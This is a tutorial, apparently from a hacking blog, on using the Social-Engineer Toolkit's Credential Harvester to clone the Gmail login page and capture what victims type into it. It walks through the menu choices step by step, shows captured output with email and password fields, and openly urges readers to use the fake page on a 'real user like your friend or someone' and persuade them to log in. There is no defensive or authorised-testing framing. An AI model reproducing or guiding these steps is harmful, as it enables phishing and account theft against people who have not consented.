Social Engineering Toolkit
Social engineering toolkit is the most powerful tool for performing social engineering attacks. It is the metasploit of social engineering in a way. It provides a very easy user interface to perform attacks like phishing, browser exploitation etc. In this tutorial we are going to see how it can be used to perform phishing attack to try to hack the gmail password of someone.
Credential Harvester Attack
Credential Harvester attack is one of the options available inside SET, that can create phishing pages and start a server to serve the pages and catch any user login data. Lets do it and see how it works.
Start SET in a terminal. It should come up with its welcome screen.
.M"""bgd `7MM"""YMM MMP""MM""YMM ,MI "Y MM `7 P' MM `7 `MMb. MM d MM `YMMNq. MMmmMM MM . `MM MM Y , MM Mb dM MM ,M MM P"Ybmmd" .JMMmmmmMMM .JMML. [---] The Social-Engineer Toolkit (SET) [---] [---] Created by: David Kennedy (ReL1K) [---] [---] Development Team: JR DePre (pr1me) [---] [---] Development Team: Joey Furr (j0fer) [---] [---] Development Team: Thomas Werth [---] [---] Development Team: Garland [---] [---] Version: 3.6 [---] [---] Codename: 'MMMMhhhhmmmmmmmmm' [---] [---] Report bugs: [email protected] [---] [---] Follow me on Twitter: dave_rel1k [---] [---] Homepage: https://www.trustedsec.com [---] Welcome to the Social-Engineer Toolkit (SET). Your one stop shop for all of your social-engineering needs.. Join us on irc.freenode.net in channel #setoolkit The Social-Engineer Toolkit is a product of TrustedSec. Visit: https://www.trustedsec.com Select from the menu: 1) Social-Engineering Attacks 2) Fast-Track Penetration Testing 3) Third Party Modules 4) Update the Metasploit Framework 5) Update the Social-Engineer Toolkit 6) Update SET configuration 7) Help, Credits, and About 99) Exit the Social-Engineer Toolkit set>
Now for this particular attack type we need to select "Social-Engineering Attacks" from the main menu. Type 1 and press enter. It will again present with a menu that would look like this
Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) SMS Spoofing Attack Vector 8) Wireless Access Point Attack Vector 9) QRCode Generator Attack Vector 10) Powershell Attack Vectors 11) Third Party Modules 99) Return back to the main menu.
Over here we have the option to select from various kinds of social engineering attacks. For our purpose select option 2 thats "Website Attack Vectors". Again will come another menu like below
1) Java Applet Attack Method 2) Metasploit Browser Exploit Method 3) Credential Harvester Attack Method 4) Tabnabbing Attack Method 5) Man Left in the Middle Attack Method 6) Web Jacking Attack Method 7) Multi-Attack Web Method 8) Victim Web Profiler 9) Create or import a CodeSigning Certificate 99) Return to Main Menu
This time along with this menu, there would be some explanation about each attack. As can be seen the Credential Harvester Attack Method is there on number 3 which we are going to use. It is explained as
So select number 3 and proceed. It will present another menu like this
1) Web Templates 2) Site Cloner 3) Custom Import 99) Return to Webattack Menu
Now over here we are going to clone gmail.com to construct our phishing page. So select option 2.
set:webattack>2 [-] Credential harvester will allow you to utilize the clone capabilities within SET [-] to harvest credentials or parameters from a website as well as place them into a report [-] This option is used for what IP the server will POST to. [-] If you're using an external IP, use your external IP for this set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.1.7 [-] SET supports both HTTP and HTTPS [-] Example: http://www.thisisafakesite.com set:webattack> Enter the url to clone:http://www.gmail.com The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website. [!] I have read the above message. Press <return> to continue [*] Social-Engineer Toolkit Credential Harvester Attack [*] Credential Harvester is running on port 80 [*] Information will be displayed to you as it arrives below:
On selecting option 2, it will ask for 2 important piece of information. The first is the ip address, to which it would submit the data and second is the url to clone which is in this case gmail.com
So enter the details and press enter when it asks to press return. Now the credential harvester would start a web server on port 80 which would serve the page gmail.com. Open the ip address of the machine in the browser from some other machine or just localhost. For example if SET is running on machine with ip address 192.168.1.10 then open that ip in a browser from another machine "http://192.168.1.10". Or give the ip address to someone else over the network :)
Now, when the username,password is entered and submitted, SET would capture the data and display on the terminal. Moreover, after capturing the data SET would redirect the user to the actual site, that is gmail.com
192.168.1.101 - - [15/Apr/2013 14:56:39] "GET / HTTP/1.1" 200 - 192.168.1.101 - - [15/Apr/2013 14:56:41] "GET / HTTP/1.1" 200 - 192.168.1.101 - - [15/Apr/2013 14:56:41] "GET / HTTP/1.1" 200 - [*] WE GOT A HIT! Printing the output: PARAM: continue=http://mail.google.com/mail/ PARAM: service=mail PARAM: rm=false PARAM: dsh=-2825129499091793842 PARAM: ltmpl=default PARAM: scc=1 PARAM: GALX=W37Icb1p3hI PARAM: pstMsg=1 PARAM: dnConn= PARAM: checkConnection= PARAM: checkedDomains=youtube PARAM: timeStmp= PARAM: secTok= PARAM: _utf8=? PARAM: bgresponse=!A0KPFdMuBMNZHUQml6hMF2ywpQ8AAxYG6ioCp0BIO0i9C5ftMNPRDRHTXxtZBB9qRoqUjLWLXn3dAJbKr3pT1eJNOwSvoduAgjxCOgnH8u3KZWS0A9kO9pIXNZXJ77OdsqK0T66SEdQLC9QV7QI8op3SM6ldH3rKqEbikKatd9DbrD7QLx3NWHfFR5O6r7PCgCDebXNk56ww-4wiFFmne05oW0ZDMstszHdBd67Z5lleTbvO2544iGrszfYzA1AJU1djcawccdN4bK2WUP1BUPQL3fidQRha5YeNe2cq81e-81DO4AjNX7OfINtsm8zpeSWOX5tHDNZWCnVwz6X5ItbkYNsfZuo9PQvJ5etzTvg6gwCpCZUDtHGR8AwSgxjQsy_hKfuJEmFNmNXFpyUi0Tu_Dw1WckbMNvRcrAhsb682WRI616BFc3aNbwNwfhRC1D6L20oxXcpzshpXxMLQDQr5GoUC6V7FIoTF9ma6mYddyrxdoxmo4d2Vh2vtovJxcYVMNRJpPa-7vvG7Ml_TQC9QJpJ21B608tccYKQpE9FzCzvmVxLMo1SHpr-Q3HChWkx7y-yq4Ba9fkKvt7XuOaq0isbZKeF_y8N1DJqGYusajFb7-jMDkQpnn6uQ-Y1OqalGQ56KSjgyWckWzPnTQ65V5V0doSbmcds8pvkWLFLQ8WM6EDMdX5RT9v5H5fkeMTWadlrJyumtHeerC5fw8qp4G_ZzH8232qySHq21XWvLxcoUS0eXHd8bGn1IA84ZpCuMt7WwEWuXss2OIrf_pfN4-YM3pLtuPIhuAnGoKAJsXS7Sib2cX34mEIiuIeC0fw1CbVqHVRz2nVT8a_QvvAeIYh5HhCz0dbn_P2FE_gosd3wG6Abnh7d08orC0TbzaW61y7H2r0owwU_SRDUKoPmVhVtp-GwjEoEanv7eZ22RgrE POSSIBLE USERNAME FIELD FOUND: Email=ghj POSSIBLE PASSWORD FIELD FOUND: Passwd=ghj PARAM: signIn=Sign+in PARAM: PersistentCookie=yes PARAM: rmShown=1 [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
See the fields Email and Passwd, they contain the details typed by user. If you want to carry out this hack on a real user like your friend or someone, then you have to give them a link that they can open from their computer and access the SET clone of gmail.
If you have SET running on your local machine then you have to give your public ip address to the victim. He would open the link and get the login page of gmail. The rest of task is to persuade him to login through that page. If you are able to do so, then you get the login details. The credential harvester attack is not limited to just stealing the login data. It can capture any generic form submission.
Phishing attacks are very common in the form of spam emails. Hackers setup phishing pages on webhosts and then spread the links over email to users. The phishing pages includes simple email sites to bank logins and even more.